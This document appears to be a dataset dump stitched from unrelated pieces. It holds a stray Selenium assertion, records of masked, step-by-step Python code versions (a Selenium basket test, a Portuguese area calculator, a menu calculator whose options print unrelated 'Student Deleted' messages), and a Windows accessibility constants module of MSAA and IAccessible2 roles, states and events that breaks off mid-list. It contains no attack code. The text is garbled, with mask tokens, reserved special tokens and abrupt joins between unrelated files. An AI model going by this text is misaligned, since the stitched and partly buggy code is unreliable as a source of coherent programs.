assert found_button != False, 'Do not found the button of add to basket'
|
flexible
|
{
"blob_id": "464be943f4fe34dda826ebada9e128f1d7d671ac",
"index": 8485,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'\n found_button = WebDriverWait(browser, 5).until(EC.\n element_to_be_clickable((By.CLASS_NAME, btn_add)))\n assert found_button != False, 'Do not found the button of add to basket'\n",
"step-3": "<mask token>\nlink = 'http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/'\n\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'\n found_button = WebDriverWait(browser, 5).until(EC.\n element_to_be_clickable((By.CLASS_NAME, btn_add)))\n assert found_button != False, 'Do not found the button of add to basket'\n",
"step-4": "from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nlink = 'http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/'\n\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'\n found_button = WebDriverWait(browser, 5).until(EC.\n element_to_be_clickable((By.CLASS_NAME, btn_add)))\n assert found_button != False, 'Do not found the button of add to basket'\n",
"step-5": "from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = \"btn.btn-lg.btn-primary.btn-add-to-basket\"\n found_button = WebDriverWait(browser, 5).until(\n EC.element_to_be_clickable((By.CLASS_NAME, btn_add))\n )\n assert found_button != False, 'Do not found the button of add to basket'",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
linha = input().split()
a = float(linha[0])
b = float(linha[1])
c = float(linha[2])
t = (a*c)/2
print('TRIANGULO: {:.3f}'.format(t))
pi = 3.14159
print("CIRCULO: {:.3f}".format(pi*c**2))
print('TRAPEZIO: {:.3f}'.format( ((a+b)*c)/2 ))
print("QUADRADO: {:.3f}".format(b**2))
print("RETANGULO: {:.3f}".format(a*b))
|
normal
|
{
"blob_id": "d44d9003e9b86722a0fc1dfe958de462db9cd5f1",
"index": 1670,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('TRIANGULO: {:.3f}'.format(t))\n<mask token>\nprint('CIRCULO: {:.3f}'.format(pi * c ** 2))\nprint('TRAPEZIO: {:.3f}'.format((a + b) * c / 2))\nprint('QUADRADO: {:.3f}'.format(b ** 2))\nprint('RETANGULO: {:.3f}'.format(a * b))\n",
"step-3": "linha = input().split()\na = float(linha[0])\nb = float(linha[1])\nc = float(linha[2])\nt = a * c / 2\nprint('TRIANGULO: {:.3f}'.format(t))\npi = 3.14159\nprint('CIRCULO: {:.3f}'.format(pi * c ** 2))\nprint('TRAPEZIO: {:.3f}'.format((a + b) * c / 2))\nprint('QUADRADO: {:.3f}'.format(b ** 2))\nprint('RETANGULO: {:.3f}'.format(a * b))\n",
"step-4": "linha = input().split()\n\na = float(linha[0])\nb = float(linha[1])\nc = float(linha[2])\n\nt = (a*c)/2\n\nprint('TRIANGULO: {:.3f}'.format(t))\n\npi = 3.14159\n\nprint(\"CIRCULO: {:.3f}\".format(pi*c**2))\n\nprint('TRAPEZIO: {:.3f}'.format( ((a+b)*c)/2 ))\n\nprint(\"QUADRADO: {:.3f}\".format(b**2))\n\nprint(\"RETANGULO: {:.3f}\".format(a*b))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
def multiplica():
one = int(input('1º: '))
two = int(input('2º: '))
print('a multiplicação é: ', one * two)
def soma():
one = int(input('1º: '))
two = int(input('2º: '))
print('a soma é: ', one + two)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def multiplica():
one = int(input('1º: '))
two = int(input('2º: '))
print('a multiplicação é: ', one * two)
def soma():
one = int(input('1º: '))
two = int(input('2º: '))
print('a soma é: ', one + two)
def subtra():
one = int(input('1º: '))
two = int(input('2º: '))
print('a subtração é: ', one - two)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def multiplica():
one = int(input('1º: '))
two = int(input('2º: '))
print('a multiplicação é: ', one * two)
def soma():
one = int(input('1º: '))
two = int(input('2º: '))
print('a soma é: ', one + two)
def subtra():
one = int(input('1º: '))
two = int(input('2º: '))
print('a subtração é: ', one - two)
<|reserved_special_token_0|>
while ans:
print(
"""
1.Multiplicação
2.Soma
3.Subtração
4.Exit/Quit
"""
)
ans = int(input('What would you like to do? '))
if ans == 1:
multiplica()
elif ans == 2:
print('\n Student Deleted')
elif ans == 3:
print('\n Student Record Found')
elif ans == 4:
print('\n Goodbye')
exit()
else:
print('\n Not Valid Choice Try again')
<|reserved_special_token_1|>
def multiplica():
one = int(input('1º: '))
two = int(input('2º: '))
print('a multiplicação é: ', one * two)
def soma():
one = int(input('1º: '))
two = int(input('2º: '))
print('a soma é: ', one + two)
def subtra():
one = int(input('1º: '))
two = int(input('2º: '))
print('a subtração é: ', one - two)
ans = True
while ans:
print(
"""
1.Multiplicação
2.Soma
3.Subtração
4.Exit/Quit
"""
)
ans = int(input('What would you like to do? '))
if ans == 1:
multiplica()
elif ans == 2:
print('\n Student Deleted')
elif ans == 3:
print('\n Student Record Found')
elif ans == 4:
print('\n Goodbye')
exit()
else:
print('\n Not Valid Choice Try again')
<|reserved_special_token_1|>
def multiplica():
one = int(input('1º: '))
two = int(input('2º: '))
print('a multiplicação é: ', one*two)
def soma():
one = int(input('1º: '))
two = int(input('2º: '))
print('a soma é: ', one+two)
def subtra():
one = int(input('1º: '))
two = int(input('2º: '))
print('a subtração é: ', one-two)
ans=True
while ans:
print ("""
1.Multiplicação
2.Soma
3.Subtração
4.Exit/Quit
""")
ans= int(input("What would you like to do? "))
if ans== 1:
multiplica()
elif ans== 2:
print("\n Student Deleted")
elif ans== 3:
print("\n Student Record Found")
elif ans== 4:
print("\n Goodbye")
exit()
else:
print("\n Not Valid Choice Try again")
|
flexible
|
{
"blob_id": "414fa4021b21cea0dc49380aebfe67f0204f0574",
"index": 5994,
"step-1": "def multiplica():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a multiplicação é: ', one * two)\n\n\ndef soma():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a soma é: ', one + two)\n\n\n<mask token>\n",
"step-2": "def multiplica():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a multiplicação é: ', one * two)\n\n\ndef soma():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a soma é: ', one + two)\n\n\ndef subtra():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a subtração é: ', one - two)\n\n\n<mask token>\n",
"step-3": "def multiplica():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a multiplicação é: ', one * two)\n\n\ndef soma():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a soma é: ', one + two)\n\n\ndef subtra():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a subtração é: ', one - two)\n\n\n<mask token>\nwhile ans:\n print(\n \"\"\"\n 1.Multiplicação\n 2.Soma\n 3.Subtração\n 4.Exit/Quit\n \"\"\"\n )\n ans = int(input('What would you like to do? '))\n if ans == 1:\n multiplica()\n elif ans == 2:\n print('\\n Student Deleted')\n elif ans == 3:\n print('\\n Student Record Found')\n elif ans == 4:\n print('\\n Goodbye')\n exit()\n else:\n print('\\n Not Valid Choice Try again')\n",
"step-4": "def multiplica():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a multiplicação é: ', one * two)\n\n\ndef soma():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a soma é: ', one + two)\n\n\ndef subtra():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a subtração é: ', one - two)\n\n\nans = True\nwhile ans:\n print(\n \"\"\"\n 1.Multiplicação\n 2.Soma\n 3.Subtração\n 4.Exit/Quit\n \"\"\"\n )\n ans = int(input('What would you like to do? '))\n if ans == 1:\n multiplica()\n elif ans == 2:\n print('\\n Student Deleted')\n elif ans == 3:\n print('\\n Student Record Found')\n elif ans == 4:\n print('\\n Goodbye')\n exit()\n else:\n print('\\n Not Valid Choice Try again')\n",
"step-5": "def multiplica():\r\n one = int(input('1º: '))\r\n two = int(input('2º: '))\r\n\r\n print('a multiplicação é: ', one*two)\r\n\r\ndef soma():\r\n one = int(input('1º: '))\r\n two = int(input('2º: '))\r\n\r\n print('a soma é: ', one+two)\r\n \r\ndef subtra():\r\n one = int(input('1º: '))\r\n two = int(input('2º: '))\r\n\r\n print('a subtração é: ', one-two)\r\n\r\nans=True\r\nwhile ans:\r\n print (\"\"\"\r\n 1.Multiplicação\r\n 2.Soma\r\n 3.Subtração\r\n 4.Exit/Quit\r\n \"\"\")\r\n ans= int(input(\"What would you like to do? \"))\r\n if ans== 1: \r\n multiplica() \r\n elif ans== 2:\r\n print(\"\\n Student Deleted\") \r\n elif ans== 3:\r\n print(\"\\n Student Record Found\") \r\n elif ans== 4:\r\n print(\"\\n Goodbye\") \r\n exit()\r\n else:\r\n print(\"\\n Not Valid Choice Try again\") \r\n\r\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
'''
Useful constants.
Inspired by pyatspi:
http://live.gnome.org/GAP/PythonATSPI
@author: Eitan Isaacson
@copyright: Copyright (c) 2008, Eitan Isaacson
@license: LGPL
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Library General Public
License as published by the Free Software Foundation; either
version 2 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Library General Public License for more details.
You should have received a copy of the GNU Library General Public
License along with this library; if not, write to the
Free Software Foundation, Inc., 59 Temple Place - Suite 330,
Boston, MA 02111-1307, USA.
'''
# Child ID.
CHILDID_SELF = 0
# IAccessibleText Constants
IA2_TEXT_OFFSET_LENGTH = -1
IA2_TEXT_OFFSET_CARET = -2
# Accessible Roles
# TODO: Is there a way to retrieve this at runtime or build time?
#
ROLE_SYSTEM_ALERT = 8
ROLE_SYSTEM_ANIMATION = 54
ROLE_SYSTEM_APPLICATION = 14
ROLE_SYSTEM_BORDER = 19
ROLE_SYSTEM_BUTTONDROPDOWN = 56
ROLE_SYSTEM_BUTTONDROPDOWNGRID = 58
ROLE_SYSTEM_BUTTONMENU = 57
ROLE_SYSTEM_CARET = 7
ROLE_SYSTEM_CELL = 29
ROLE_SYSTEM_CHARACTER = 32
ROLE_SYSTEM_CHART = 17
ROLE_SYSTEM_CHECKBUTTON = 44
ROLE_SYSTEM_CLIENT = 10
ROLE_SYSTEM_CLOCK = 61
ROLE_SYSTEM_COLUMN = 27
ROLE_SYSTEM_COLUMNHEADER = 25
ROLE_SYSTEM_COMBOBOX = 46
ROLE_SYSTEM_CURSOR = 6
ROLE_SYSTEM_DIAGRAM = 53
ROLE_SYSTEM_DIAL = 49
ROLE_SYSTEM_DIALOG = 18
ROLE_SYSTEM_DOCUMENT = 15
ROLE_SYSTEM_DROPLIST = 47
ROLE_SYSTEM_EQUATION = 55
ROLE_SYSTEM_GRAPHIC = 40
ROLE_SYSTEM_GRIP = 4
ROLE_SYSTEM_GROUPING = 20
ROLE_SYSTEM_HELPBALLOON = 31
ROLE_SYSTEM_HOTKEYFIELD = 50
ROLE_SYSTEM_INDICATOR = 39
ROLE_SYSTEM_LINK = 30
ROLE_SYSTEM_LIST = 33
ROLE_SYSTEM_LISTITEM = 34
ROLE_SYSTEM_MENUBAR = 2
ROLE_SYSTEM_MENUITEM = 12
ROLE_SYSTEM_MENUPOPUP = 11
ROLE_SYSTEM_OUTLINE = 35
ROLE_SYSTEM_OUTLINEITEM = 36
ROLE_SYSTEM_PAGETAB = 37
ROLE_SYSTEM_PAGETABLIST = 60
ROLE_SYSTEM_PANE = 16
ROLE_SYSTEM_PROGRESSBAR = 48
ROLE_SYSTEM_PROPERTYPAGE = 38
ROLE_SYSTEM_PUSHBUTTON = 43
ROLE_SYSTEM_RADIOBUTTON = 45
ROLE_SYSTEM_ROW = 28
ROLE_SYSTEM_ROWHEADER = 26
ROLE_SYSTEM_SCROLLBAR = 3
ROLE_SYSTEM_SEPARATOR = 21
ROLE_SYSTEM_SLIDER = 51
ROLE_SYSTEM_SOUND = 5
ROLE_SYSTEM_SPINBUTTON = 52
ROLE_SYSTEM_STATICTEXT = 41
ROLE_SYSTEM_STATUSBAR = 23
ROLE_SYSTEM_TABLE = 24
ROLE_SYSTEM_TEXT = 42
ROLE_SYSTEM_TITLEBAR = 1
ROLE_SYSTEM_TOOLBAR = 22
ROLE_SYSTEM_TOOLTIP = 13
ROLE_SYSTEM_WHITESPACE = 59
ROLE_SYSTEM_WINDOW = 9
IA2_ROLE_UNKNOWN = 0
IA2_ROLE_CANVAS = 0x401
IA2_ROLE_CAPTION = 0x402
IA2_ROLE_CHECK_MENU_ITEM = 0x403
IA2_ROLE_COLOR_CHOOSER = 0x404
IA2_ROLE_DATE_EDITOR = 0x405
IA2_ROLE_DESKTOP_ICON = 0x406
IA2_ROLE_DESKTOP_PANE = 0x407
IA2_ROLE_DIRECTORY_PANE = 0x408
IA2_ROLE_EDITBAR = 0x409
IA2_ROLE_EMBEDDED_OBJECT = 0x40a
IA2_ROLE_ENDNOTE = 0x40b
IA2_ROLE_FILE_CHOOSER = 0x40c
IA2_ROLE_FONT_CHOOSER = 0x40d
IA2_ROLE_FOOTER = 0x40e
IA2_ROLE_FOOTNOTE = 0x40f
IA2_ROLE_FORM = 0x410
IA2_ROLE_FRAME = 0x411
IA2_ROLE_GLASS_PANE = 0x412
IA2_ROLE_HEADER = 0x413
IA2_ROLE_HEADING = 0x414
IA2_ROLE_ICON = 0x415
IA2_ROLE_IMAGE_MAP = 0x416
IA2_ROLE_INPUT_METHOD_WINDOW = 0x417
IA2_ROLE_INTERNAL_FRAME = 0x418
IA2_ROLE_LABEL = 0x419
IA2_ROLE_LAYERED_PANE = 0x41a
IA2_ROLE_NOTE = 0x41b
IA2_ROLE_OPTION_PANE = 0x41c
IA2_ROLE_PAGE = 0x41d
IA2_ROLE_PARAGRAPH = 0x41e
IA2_ROLE_RADIO_MENU_ITEM = 0x41f
IA2_ROLE_REDUNDANT_OBJECT = 0x420
IA2_ROLE_ROOT_PANE = 0x421
IA2_ROLE_RULER = 0x422
IA2_ROLE_SCROLL_PANE = 0x423
IA2_ROLE_SECTION = 0x424
IA2_ROLE_SHAPE = 0x425
IA2_ROLE_SPLIT_PANE = 0x426
IA2_ROLE_TEAR_OFF_MENU = 0x427
IA2_ROLE_TERMINAL = 0x428
IA2_ROLE_TEXT_FRAME = 0x429
IA2_ROLE_TOGGLE_BUTTON = 0x42a
IA2_ROLE_VIEW_PORT = 0x42b
IA2_ROLE_COMPLEMENTARY_CONTENT = 0x42c
IA2_ROLE_LANDMARK = 0x42d
# Unlocalized role strings
UNLOCALIZED_ROLE_NAMES = {
1: u'ROLE_SYSTEM_TITLEBAR',
2: u'ROLE_SYSTEM_MENUBAR',
3: u'ROLE_SYSTEM_SCROLLBAR',
4: u'ROLE_SYSTEM_GRIP',
5: u'ROLE_SYSTEM_SOUND',
6: u'ROLE_SYSTEM_CURSOR',
7: u'ROLE_SYSTEM_CARET',
8: u'ROLE_SYSTEM_ALERT',
9: u'ROLE_SYSTEM_WINDOW',
10: u'ROLE_SYSTEM_CLIENT',
11: u'ROLE_SYSTEM_MENUPOPUP',
12: u'ROLE_SYSTEM_MENUITEM',
13: u'ROLE_SYSTEM_TOOLTIP',
14: u'ROLE_SYSTEM_APPLICATION',
15: u'ROLE_SYSTEM_DOCUMENT',
16: u'ROLE_SYSTEM_PANE',
17: u'ROLE_SYSTEM_CHART',
18: u'ROLE_SYSTEM_DIALOG',
19: u'ROLE_SYSTEM_BORDER',
20: u'ROLE_SYSTEM_GROUPING',
21: u'ROLE_SYSTEM_SEPARATOR',
22: u'ROLE_SYSTEM_TOOLBAR',
23: u'ROLE_SYSTEM_STATUSBAR',
24: u'ROLE_SYSTEM_TABLE',
25: u'ROLE_SYSTEM_COLUMNHEADER',
26: u'ROLE_SYSTEM_ROWHEADER',
27: u'ROLE_SYSTEM_COLUMN',
28: u'ROLE_SYSTEM_ROW',
29: u'ROLE_SYSTEM_CELL',
30: u'ROLE_SYSTEM_LINK',
31: u'ROLE_SYSTEM_HELPBALLOON',
32: u'ROLE_SYSTEM_CHARACTER',
33: u'ROLE_SYSTEM_LIST',
34: u'ROLE_SYSTEM_LISTITEM',
35: u'ROLE_SYSTEM_OUTLINE',
36: u'ROLE_SYSTEM_OUTLINEITEM',
37: u'ROLE_SYSTEM_PAGETAB',
38: u'ROLE_SYSTEM_PROPERTYPAGE',
39: u'ROLE_SYSTEM_INDICATOR',
40: u'ROLE_SYSTEM_GRAPHIC',
41: u'ROLE_SYSTEM_STATICTEXT',
42: u'ROLE_SYSTEM_TEXT',
43: u'ROLE_SYSTEM_PUSHBUTTON',
44: u'ROLE_SYSTEM_CHECKBUTTON',
45: u'ROLE_SYSTEM_RADIOBUTTON',
46: u'ROLE_SYSTEM_COMBOBOX',
47: u'ROLE_SYSTEM_DROPLIST',
48: u'ROLE_SYSTEM_PROGRESSBAR',
49: u'ROLE_SYSTEM_DIAL',
50: u'ROLE_SYSTEM_HOTKEYFIELD',
51: u'ROLE_SYSTEM_SLIDER',
52: u'ROLE_SYSTEM_SPINBUTTON',
53: u'ROLE_SYSTEM_DIAGRAM',
54: u'ROLE_SYSTEM_ANIMATION',
55: u'ROLE_SYSTEM_EQUATION',
56: u'ROLE_SYSTEM_BUTTONDROPDOWN',
57: u'ROLE_SYSTEM_BUTTONMENU',
58: u'ROLE_SYSTEM_BUTTONDROPDOWNGRID',
59: u'ROLE_SYSTEM_WHITESPACE',
60: u'ROLE_SYSTEM_PAGETABLIST',
61: u'ROLE_SYSTEM_CLOCK'}
# Unlocalized role strings
UNLOCALIZED_IA2_ROLE_NAMES = {
0x000: u'IA2_ROLE_UNKNOWN',
0x401: u'IA2_ROLE_CANVAS',
0x402: u'IA2_ROLE_CAPTION',
0x403: u'IA2_ROLE_CHECK_MENU_ITEM',
0x404: u'IA2_ROLE_COLOR_CHOOSER',
0x405: u'IA2_ROLE_DATE_EDITOR',
0x406: u'IA2_ROLE_DESKTOP_ICON',
0x407: u'IA2_ROLE_DESKTOP_PANE',
0x408: u'IA2_ROLE_DIRECTORY_PANE',
0x409: u'IA2_ROLE_EDITBAR',
0x40a: u'IA2_ROLE_EMBEDDED_OBJECT',
0x40b: u'IA2_ROLE_ENDNOTE',
0x40c: u'IA2_ROLE_FILE_CHOOSER',
0x40d: u'IA2_ROLE_FONT_CHOOSER',
0x40e: u'IA2_ROLE_FOOTER',
0x40f: u'IA2_ROLE_FOOTNOTE',
0x410: u'IA2_ROLE_FORM',
0x411: u'IA2_ROLE_FRAME',
0x412: u'IA2_ROLE_GLASS_PANE',
0x413: u'IA2_ROLE_HEADER',
0x414: u'IA2_ROLE_HEADING',
0x415: u'IA2_ROLE_ICON',
0x416: u'IA2_ROLE_IMAGE_MAP',
0x417: u'IA2_ROLE_INPUT_METHOD_WINDOW',
0x418: u'IA2_ROLE_INTERNAL_FRAME',
0x419: u'IA2_ROLE_LABEL',
0x41a: u'IA2_ROLE_LAYERED_PANE',
0x41b: u'IA2_ROLE_NOTE',
0x41c: u'IA2_ROLE_OPTION_PANE',
0x41d: u'IA2_ROLE_PAGE',
0x41e: u'IA2_ROLE_PARAGRAPH',
0x41f: u'IA2_ROLE_RADIO_MENU_ITEM',
0x420: u'IA2_ROLE_REDUNDANT_OBJECT',
0x421: u'IA2_ROLE_ROOT_PANE',
0x422: u'IA2_ROLE_RULER',
0x423: u'IA2_ROLE_SCROLL_PANE',
0x424: u'IA2_ROLE_SECTION',
0x425: u'IA2_ROLE_SHAPE',
0x426: u'IA2_ROLE_SPLIT_PANE',
0x427: u'IA2_ROLE_TEAR_OFF_MENU',
0x428: u'IA2_ROLE_TERMINAL',
0x429: u'IA2_ROLE_TEXT_FRAME',
0x42a: u'IA2_ROLE_TOGGLE_BUTTON',
0x42b: u'IA2_ROLE_VIEW_PORT',
0x42c: u'IA2_ROLE_COMPLEMENTARY_CONTENT',
0x42d: u'IA2_ROLE_LANDMARK'}
# Navigation constants
NAVDIR_DOWN = 2
NAVDIR_FIRSTCHILD = 7
NAVDIR_LASTCHILD = 8
NAVDIR_LEFT = 3
NAVDIR_NEXT = 5
NAVDIR_PREVIOUS = 6
NAVDIR_RIGHT = 4
NAVDIR_UP = 1
STATE_SYSTEM_UNAVAILABLE = 0x1
STATE_SYSTEM_SELECTED = 0x2
STATE_SYSTEM_FOCUSED = 0x4
STATE_SYSTEM_PRESSED = 0x8
STATE_SYSTEM_CHECKED = 0x10
STATE_SYSTEM_MIXED = 0x20
STATE_SYSTEM_READONLY = 0x40
STATE_SYSTEM_HOTTRACKED = 0x80
STATE_SYSTEM_DEFAULT = 0x100
STATE_SYSTEM_EXPANDED = 0x200
STATE_SYSTEM_COLLAPSED = 0x400
STATE_SYSTEM_BUSY = 0x800
STATE_SYSTEM_FLOATING = 0x1000
STATE_SYSTEM_MARQUEED = 0x2000
STATE_SYSTEM_ANIMATED = 0x4000
STATE_SYSTEM_INVISIBLE = 0x8000
STATE_SYSTEM_OFFSCREEN = 0x10000
STATE_SYSTEM_SIZEABLE = 0x20000
STATE_SYSTEM_MOVEABLE = 0x40000
STATE_SYSTEM_SELFVOICING = 0x80000
STATE_SYSTEM_FOCUSABLE = 0x100000
STATE_SYSTEM_SELECTABLE = 0x200000
STATE_SYSTEM_LINKED = 0x400000
STATE_SYSTEM_TRAVERSED = 0x800000
STATE_SYSTEM_MULTISELECTABLE = 0x1000000
STATE_SYSTEM_EXTSELECTABLE = 0x2000000
STATE_SYSTEM_HASSUBMENU = 0x4000000
STATE_SYSTEM_ALERT_LOW = 0x4000000
STATE_SYSTEM_ALERT_MEDIUM = 0x8000000
STATE_SYSTEM_ALERT_HIGH = 0x10000000
STATE_SYSTEM_PROTECTED = 0x20000000
STATE_SYSTEM_HASPOPUP = 0x40000000
STATE_SYSTEM_VALID = 0x1fffffff
# Unlocalized state strings
UNLOCALIZED_STATE_NAMES = {
1: u'STATE_SYSTEM_UNAVAILABLE',
2: u'STATE_SYSTEM_SELECTED',
4: u'STATE_SYSTEM_FOCUSED',
8: u'STATE_SYSTEM_PRESSED',
16: u'STATE_SYSTEM_CHECKED',
32: u'STATE_SYSTEM_MIXED',
64: u'STATE_SYSTEM_READONLY',
128: u'STATE_SYSTEM_HOTTRACKED',
256: u'STATE_SYSTEM_DEFAULT',
512: u'STATE_SYSTEM_EXPANDED',
1024: u'STATE_SYSTEM_COLLAPSED',
2048: u'STATE_SYSTEM_BUSY',
4096: u'STATE_SYSTEM_FLOATING',
8192: u'STATE_SYSTEM_MARQUEED',
16384: u'STATE_SYSTEM_ANIMATED',
32768: u'STATE_SYSTEM_INVISIBLE',
65536: u'STATE_SYSTEM_OFFSCREEN',
131072: u'STATE_SYSTEM_SIZEABLE',
262144: u'STATE_SYSTEM_MOVEABLE',
524288: u'STATE_SYSTEM_SELFVOICING',
1048576: u'STATE_SYSTEM_FOCUSABLE',
2097152: u'STATE_SYSTEM_SELECTABLE',
4194304: u'STATE_SYSTEM_LINKED',
8388608: u'STATE_SYSTEM_TRAVERSED',
16777216: u'STATE_SYSTEM_MULTISELECTABLE',
33554432: u'STATE_SYSTEM_EXTSELECTABLE',
67108864: u'STATE_SYSTEM_ALERT_LOW',
134217728: u'STATE_SYSTEM_ALERT_MEDIUM',
268435456: u'STATE_SYSTEM_ALERT_HIGH',
536870912: u'STATE_SYSTEM_PROTECTED',
1073741824: u'STATE_SYSTEM_HASPOPUP',
0x1fffffff: u'STATE_SYSTEM_VALID'}
IA2_STATE_ACTIVE = 0x1
IA2_STATE_ARMED = 0x2
IA2_STATE_DEFUNCT = 0x4
IA2_STATE_EDITABLE = 0x8
IA2_STATE_HORIZONTAL = 0x10
IA2_STATE_ICONIFIED = 0x20
IA2_STATE_INVALID_ENTRY = 0x40
IA2_STATE_MANAGES_DESCENDANTS = 0x80
IA2_STATE_MODAL = 0x100
IA2_STATE_MULTI_LINE = 0x200
IA2_STATE_OPAQUE = 0x400
IA2_STATE_REQUIRED = 0x800
IA2_STATE_SELECTABLE_TEXT = 0x1000
IA2_STATE_SINGLE_LINE = 0x2000
IA2_STATE_STALE = 0x4000
IA2_STATE_SUPPORTS_AUTOCOMPLETION = 0x8000
IA2_STATE_TRANSIENT = 0x10000
IA2_STATE_VERTICAL = 0x20000
IA2_STATE_CHECKABLE = 0x40000
IA2_STATE_PINNED = 0x80000
UNLOCALIZED_IA2_STATE_NAMES = {
1: u'IA2_STATE_ACTIVE',
2: u'IA2_STATE_ARMED',
4: u'IA2_STATE_DEFUNCT',
8: u'IA2_STATE_EDITABLE',
16: u'IA2_STATE_HORIZONTAL',
32: u'IA2_STATE_ICONIFIED',
64: u'IA2_STATE_INVALID_ENTRY',
128: u'IA2_STATE_MANAGES_DESCENDANTS',
256: u'IA2_STATE_MODAL',
512: u'IA2_STATE_MULTI_LINE',
1024: u'IA2_STATE_OPAQUE',
2048: u'IA2_STATE_REQUIRED',
4096: u'IA2_STATE_SELECTABLE_TEXT',
8192: u'IA2_STATE_SINGLE_LINE',
16384: u'IA2_STATE_STALE',
32768: u'IA2_STATE_SUPPORTS_AUTOCOMPLETION',
65536: u'IA2_STATE_TRANSIENT',
131072: u'IA2_STATE_VERTICAL',
262144: u'IA2_STATE_CHECKABLE',
524288: u'IA2_STATE_PINNED'}
UNLOCALIZED_IA2_RELATION_TYPES = {
u'containingApplication' : u'IA2_RELATION_CONTAINING_APPLICATION',
u'containingDocument' : u'IA2_RELATION_CONTAINING_DOCUMENT',
u'containingTabPane' : u'IA2_RELATION_CONTAINING_TAB_PANE',
u'containingWindow' : u'IA2_RELATION_CONTAINING_WINDOW',
u'controlledBy' : u'IA2_RELATION_CONTROLLED_BY',
u'controllerFor' : u'IA2_RELATION_CONTROLLER_FOR',
u'describedBy' : u'IA2_RELATION_DESCRIBED_BY',
u'descriptionFor' : u'IA2_RELATION_DESCRIPTION_FOR',
u'details' : u'IA2_RELATION_DETAILS',
u'detailsFor' : u'IA2_RELATION_DETAILS_FOR',
u'embeddedBy' : u'IA2_RELATION_EMBEDDED_BY',
u'embeds' : u'IA2_RELATION_EMBEDS',
u'errorMessage' : u'IA2_RELATION_ERROR_MESSAGE',
u'errorFor' : u'IA2_RELATION_ERROR_FOR',
u'flowsFrom' : u'IA2_RELATION_FLOWS_FROM',
u'flowsTo' : u'IA2_RELATION_FLOWS_TO',
u'labelFor' : u'IA2_RELATION_LABEL_FOR',
u'labelledBy' : u'IA2_RELATION_LABELED_BY',
u'labelledBy' : u'IA2_RELATION_LABELLED_BY',
u'memberOf' : u'IA2_RELATION_MEMBER_OF',
u'nextTabbable' : u'IA2_RELATION_NEXT_TABBABLE',
u'nodeChildOf' : u'IA2_RELATION_NODE_CHILD_OF',
u'nodeParentOf' : u'IA2_RELATION_NODE_PARENT_OF',
u'parentWindowOf' : u'IA2_RELATION_PARENT_WINDOW_OF',
u'popupFor' : u'IA2_RELATION_POPUP_FOR',
u'previousTabbable' : u'IA2_RELATION_PREVIOUS_TABBABLE',
u'subwindowOf' : u'IA2_RELATION_SUBWINDOW_OF'}
# SetWinEventHook() flags
WINEVENT_OUTOFCONTEXT = 0x0
WINEVENT_SKIPOWNTHREAD =0x1
WINEVENT_SKIPOWNPROCESS = 0x2
WINEVENT_INCONTEXT = 0x4
#win events
EVENT_SYSTEM_SOUND = 0x1
EVENT_SYSTEM_ALERT = 0x2
EVENT_SYSTEM_FOREGROUND = 0x3
EVENT_SYSTEM_MENUSTART = 0x4
EVENT_SYSTEM_MENUEND = 0x5
EVENT_SYSTEM_MENUPOPUPSTART = 0x6
EVENT_SYSTEM_MENUPOPUPEND = 0x7
EVENT_SYSTEM_CAPTURESTART = 0x8
EVENT_SYSTEM_CAPTUREEND = 0x9
EVENT_SYSTEM_MOVESIZESTART = 0xa
EVENT_SYSTEM_MOVESIZEEND = 0xb
EVENT_SYSTEM_CONTEXTHELPSTART = 0xc
EVENT_SYSTEM_CONTEXTHELPEND = 0xd
EVENT_SYSTEM_DRAGDROPSTART = 0xe
EVENT_SYSTEM_DRAGDROPEND = 0xf
EVENT_SYSTEM_DIALOGSTART = 0x10
EVENT_SYSTEM_DIALOGEND = 0x11
EVENT_SYSTEM_SCROLLINGSTART = 0x12
EVENT_SYSTEM_SCROLLINGEND = 0x13
EVENT_SYSTEM_SWITCHSTART = 0x14
EVENT_SYSTEM_SWITCHEND = 0x15
EVENT_SYSTEM_MINIMIZESTART = 0x16
EVENT_SYSTEM_MINIMIZEEND = 0x17
EVENT_OBJECT_CREATE = 0x8000
EVENT_OBJECT_DESTROY = 0x8001
EVENT_OBJECT_SHOW = 0x8002
EVENT_OBJECT_HIDE = 0x8003
EVENT_OBJECT_REORDER = 0x8004
EVENT_OBJECT_FOCUS = 0x8005
EVENT_OBJECT_SELECTION = 0x8006
EVENT_OBJECT_SELECTIONADD = 0x8007
EVENT_OBJECT_SELECTIONREMOVE = 0x8008
EVENT_OBJECT_SELECTIONWITHIN = 0x8009
EVENT_OBJECT_STATECHANGE = 0x800a
